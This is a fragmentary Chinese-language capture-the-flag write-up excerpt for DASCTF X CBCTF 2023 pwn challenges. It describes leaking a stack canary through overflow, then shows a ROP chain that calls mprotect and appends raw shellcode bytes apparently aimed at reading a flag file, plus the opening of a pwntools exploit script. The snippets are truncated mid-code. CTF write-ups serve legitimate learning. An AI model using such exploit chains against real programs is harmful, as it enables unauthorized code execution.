DASCTF X CBCTF 2023|无畏者先行 [PWN] WP📌 1.GuestBook 题目保护情况 开启canary,nx保护 64位ida载入 首先可以通过输入0x18个垃圾数据可以通过打印泄露出canary 这里至多有四次输入机会每次都可以溢出,但是有00截断 程序存在
rop=p64(pop_rdi)+p64(leak_addr-0x50)+p64(pop_rsi)+p64(0x1000)+p64(pop_rdx_r12)+p64(7)+p64(0)+p64(pop_rax)+p64(10)+p64(mprotect)+p64(base_addr+0x4150) rop+=b"\x48\xC7\xC0\x03\x00\x00\x00\x48\xC7\xC7\x00\x00\x00\x00\x0F\x05\x49\xB8\x2F\x66\x6C\x61\...
绕过这个密码之后就是简单的栈溢出的叭 frompwnimport* context.os ='linux'context.log_level ="debug"context.arch ='amd64'p = process('./canary3')#, env={"LD_PRELOAD":'./libc-2.27.so'})#libc = ELF('./libc-2.27.so')elf = ELF('./canary3') s =lambdadata :p.send(str(data)) ...